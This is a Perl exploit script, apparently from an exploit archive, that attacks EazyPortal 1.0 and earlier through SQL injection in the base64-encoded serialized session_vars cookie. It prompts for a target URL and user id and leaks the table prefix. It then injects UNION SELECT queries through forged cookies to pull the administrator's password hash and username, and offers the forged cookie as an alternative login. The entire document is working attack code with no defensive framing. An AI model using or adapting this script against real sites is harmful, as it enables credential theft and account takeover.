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EazyPortal <= 1.0 (COOKIE) Remote SQL Injection Exploit
======================================================= EazyPortal <= 1.0 (COOKIE) Remote SQL Injection Exploit ======================================================= #!/usr/bin/perl # # Vendor url: http://www.eazyportal.com/ # # exploit goes through $_COOKIE # use LWP::UserAgent; use MIME::Base64; print "# # EazyPortal <= 1.0 SQL Injection Exploit # By Iron - www.randombase.com # Greets to everyone at RootShell Security Group # # Example target url: http://www.target.com/Portal/ Target url?"; chomp($target=<stdin>); if($target !~ /^http:\/\//) { $target = "http://".$target; } if($target !~ /\/$/) { $target .= "/"; } print "User id to retrieve name/password from? (1 = admin by default)"; chomp($target_id=<stdin>); print "\n[+]Retrieving table prefix..."; @header = ('Cookie' => ' session_vars=YTo2OntzOjU6InVuYW1lIjtzOjEyOiInIEVSUk9SIFpPTUciO3M6NDoidXB3ZCI7czozMjoiMDk4ZjZiY2Q0NjIxZDM3M2NhZGU0ZTgzMjYyN2I0ZjYiO3M6MzoidWlkIjtzOjE6IjEiO3M6NDoidWdtdCI7czoyOiIrMCI7czoxMDoidWxhc3R2aXNpdCI7czoxMDoiMTIwNDA0NjIwNiI7czo0OiJwcml2IjthOjk6e3M6NDoibmV3cyI7czo0OiJuZXdzIjtzOjU6InBvbGxzIjtzOjI6InBvIjtzOjc6Im1haWxpbmciO3M6MjoibWEiO3M6NToicGFnZXMiO3M6MjoicGEiO3M6NToidXNlcnMiO3M6MjoidXMiO3M6ODoic2V0dGluZ3MiO3M6Mjoic2UiO3M6NToiZm9ydW0iO3M6MjoiZm8iO3M6NjoiYmxvY2tzIjtzOjI6ImJsIjtzOjg6ImRvd25sb2FkIjtzOjI6ImRvIjt9fQ=='); $ua = LWP::UserAgent->new; $ua->timeout(10); $ua->env_proxy; $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv: Gecko/20080201 Firefox/"); $response = $ua->get($target, @header); if ($response->is_success) { #print $response->content; if($response->content =~ /select \* from (.*)users where ustatus/i) { print "\n[+]Got prefix: $1"; $prefix = $1; } else { print "\n[-]Failed, trying empty prefix."; $prefix = ""; } } else { die "Error: ".$response->status_line; } print "\n[+]Building cookie"; $query = "lalalalalala' UNION SELECT upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd,upwd FROM ".$prefix."users WHERE 1=1 AND uid ='".$target_id; #fucked up query but it works :) $cookie = encode_base64('a:6:{s:5:"uname";s:'.length($query).':"'.$query.'";s:4:"upwd";s:17:"\' OR upwd != \'lol";s:3:"uid";s:1:"1";s:4:"ugmt";s:2:"+0";s:10:"ulastvisit";s:10:"1204046206";s:4:"priv";a:9:{s:4:"news";s:4:"news";s:5:"polls";s:2:"po";s:7:"mailing";s:2:"ma";s:5:"pages";s:2:"pa";s:5:"users";s:2:"us";s:8:"settings";s:2:"se";s:5:"forum";s:2:"fo";s:6:"blocks";s:2:"bl";s:8:"download";s:2:"do";}}'); $cookie =~ s/\n//g; $logincookie = $cookie; print "\n[+]Eating cookie :P"; print "\n[+]Retrieving password"; @header = ('Cookie' => 'session_vars='.$cookie); $response = $ua->get($target, @header); if ($response->is_success) { if($response->content =~ /([a-f0-9]{32})/i) { $p = $1; } else { print "\n[-]Exploit failed :'("; exit; } } else { die "Error: ".$response->status_line; } print "\n[+]Retrieving username"; $query = "lalalalalala' UNION SELECT uname,uname,uname,uname,uname,uname,uname,uname,uname,uname,uname,uname,uname,uname,uname FROM ".$prefix."users WHERE 1=1 AND uid ='".$target_id; $cookie = encode_base64('a:6:{s:5:"uname";s:'.length($query).':"'.$query.'";s:4:"upwd";s:17:"\' OR upwd != \'lol";s:3:"uid";s:1:"1";s:4:"ugmt";s:2:"+0";s:10:"ulastvisit";s:10:"1204046206";s:4:"priv";a:9:{s:4:"news";s:4:"news";s:5:"polls";s:2:"po";s:7:"mailing";s:2:"ma";s:5:"pages";s:2:"pa";s:5:"users";s:2:"us";s:8:"settings";s:2:"se";s:5:"forum";s:2:"fo";s:6:"blocks";s:2:"bl";s:8:"download";s:2:"do";}}'); $cookie =~ s/\n//g; @header = ('Cookie' => 'session_vars='.$cookie); $response = $ua->get($target, @header); if ($response->is_success) { if($response->content =~ />Log Out \((.*)\)<\/a>/i) { print "\n[+]Exploit succeeded!"; print "\n"."#" x 50 ."\n[+]Username: $1"; print "\n[+]Password: $p"."\n"."#" x 50; } else { print "\n[-]Exploit only got md5 pass :O"; print "\n[+]Password: $p"; } # print "\n\n:[+]You can also login with this cookie:\n"."#" x 50 ."\n$logincookie\n"."#" x 50; #uncomment if you have troubles cracking the hash } else { die "Error: ".$response->status_line; } # 0day.today [2024-12-26] #